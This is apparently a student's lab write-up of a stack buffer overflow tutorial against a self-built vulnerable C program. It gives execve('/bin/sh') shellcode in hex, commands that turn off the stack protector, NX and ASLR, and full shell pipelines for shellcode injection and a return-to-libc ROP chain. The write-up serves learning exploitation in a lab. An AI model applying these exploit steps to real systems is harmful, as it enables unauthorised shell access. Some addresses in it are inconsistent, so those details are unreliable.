Max Inciong
The purpose of each of the sections is to activate a shell by finding a way to inject code into c input prompts. If done incorrectly, the program will simply have a segmentation fault.

Part 1
The Shell Game
We start of by creating shell.c, which seems to pop the rdi register and xors a few registers to themselves. from the resulting program, we perform an object dump to find out how many bytes it takes to execute. The offset from needle0 to needle1 is 29 bytes, which we round up to 32. we then create a shellcode using a hexdump starting from the beginning of  the a.out pointer.
My specific shellcode is

eb0e5f4831c0b03b4831f64831d20f05e8edffffff2f62696e2f736800ef
bead

First Code Injection
Stack Smashing Protector protects cases of input buffer overload by rearranging the stack layout.
Never Execute/NX is what causes the program to segfault when I try to execute code within the program
Address space layout randomization or ASL makes it so that the location of the stack is randomized every run

The victim code simply asks for an input with a buffer of 64 bytes. We start by disabling the stack smashing protector for the victim code using 
gcc -fno-stack-protector -o victim victim.c
we disable the executable space protection by using the command
execstack -s victim
which sets victim to require an executable stack. We then place the snippet 
char name[64];
printf("%p\n", name);
into the victim code so we know where its address is.
With ASLR activated, this print appears as a different address every time. We can disable it by running the victim binary as
setarch `arch` -R ./victim
which always returns 0x7fffffffe110 as the address. Since GCC is little endian, we need to get this value in little endian using
a=`printf %016x 0x7fffffffe090 | tac -rs..`
from there we concatenate the shellcode, 80 zeroes, and the little endian address. The zeroes fill up the buffer and then overwrite the RBP register and the return address to point to the shellcode.
Running the command below will set up a shell as a result.
( ( cat shellcode ; printf %080d 0 ; echo $a ) | xxd -r -p ; cat ) | setarch `arch` -R ./victim


Part 2
when running the program without ASLR,we can find the distance to the name buffer using the command
ps -o cmd,esp -C victim
which locates the stack pointer in victim at the time of input. It is run in a separate terminal while victim is prompting an input. It ends up being 88 bytes. From here we can find the stack pointer of a victim instance with ASLR enabled
mkfifo pip
cat pip | ./victim
We create a pipe and run victim in one terminal and in another the following code is run
sp=`ps --no-header -C victim -o esp`
a=`printf %016x $((0x7fff$sp+88)) | tac -r -s..`
sp is the stack pointer, and a adds the offset of the buffer and sets it to little endian. From there we can run
( ( cat shellcode ; printf %080d 0 ; echo $a ) | xxd -r -p ; cat ) > pip
which allows you to execute a shell, but the while the commands are input in the second terminal open, the results are shown in the first terminal

Before I had some problems with running the code and got some segfaults but that was because i didnt enable the execstack. I simply enabled it in the terminal and it worked.

Part 3
ROP

IN this part of the tutorial we disable the execstack. This basically gives NX more power. This section of the tutorial is to bypass that
 We are instructed to locate libc using 
locate libc.so
We want to find the command pop %rdi; retq
There are two ways to do this
xxd -c1 -p /lib/x86_64-linux-gnu/libc.so.6 | grep -n -B1 c3 |grep 5f -m1 | awk '{printf"%x\n",$1-1}'
is a workaround that searches for c3 and 5f
Alternatively we can download the ROP tool
 ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 --only "pop|ret" | grep rdi
the latter doesnt use a workaround that finds the specific command set yet is slower than the one that does use it
IN either case the result is the return offset
we want to combine the libcaddress + the offset, the address of /bin/sh, and libc's system function, concatenate the three and use the concatenation to overwrite the return address

TO find libc's address we run the ASLR disabled version of victim in one terminal, then in another we run
pid=`ps -C victim -o pid --no-headers | tr -d ' '`
grep libc /proc/$pid/maps
$
the first command gets the process status of victim and the second finds the memory address of libc based on that
the address of /bin/ is given in the ALR free version of victim
we find the address for system as the offset of libc + system
to find the system funcion offset we run
nm -D /lib/x86_64-linux-gnu/libc.so.6 | grep '\<system\>'

My libc address ended up being 0x7ffff7a11000, the offset was 22b9a
the /bin/sh was given as 0x7fffffffe110
and the system offset was 46590
Theoretically the final command to run should be
(echo -n /bin/sh | xxd -p; printf %0130d 0;
printf %016x $((0x7ffff7a11000+0x22b9a)) | tac -rs..;
printf %016x 0x7fffffffe110 | tac -rs..;
printf %016x $((0x7ffff7a11000+0x46590)) | tac -rs..) |
xxd -r -p | setarch `arch` -R ./victim

HOwever as of right now I do not understand why I am segfaulting. I think that execstack being disabled has part to do with it. NX is somehow still in play.

It turns out my version of linux has a different stack layout
I have also tried
(((printf %0144d 0; printf %016x 0x7FFFF7A33B9A | tac -rs..; printf %016x 0x7fffffffe180 | tac -rs..; printf %016x 0x7FFFF7A57590 | tac -rs.. ; echo -n /bin/sh | xxd -p) | xxd -r -p) ; cat) | ./victim
but it only works  if you run the command 
This command works if 
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
was run prior to it, which disables ASLR system wide. To make it more local, the following command must be run


(((printf %0144d 0; printf %016x 0x7FFFF7A33B9A | tac -rs..; printf %016x 0x7fffffffe170 | tac -rs..; printf %016x 0x7FFFF7A57590 | tac -rs.. ; echo -n /bin/sh | xxd -p) | xxd -r -p) ; cat) | setarch `arch` -R ./victim
or to be more precise
(((printf %0144d 0; printf %016x $((0x7ffff7a11000+0x22b9a))| tac -rs..; printf %016x $((0x7fffffffe110+64+8+24)) | tac -rs..; printf %016x $((0x7ffff7a11000+0x46590)) | tac -rs.. ; echo -n /bin/sh | xxd -p) | xxd -r -p) ; cat) | setarch `arch` -R ./victim
The difference between this and the first one that didnt work is that there are more zeroes to buffer, 144 instead of 130, and the /bin/sh is echoed at the end rather than the beginning. Furthermore, rather than straight input the bin/sh address into the register 64d + 8d + 24d is added to the address of /bin/sh which i suppose is the EBP register and a 64 byte buffer.

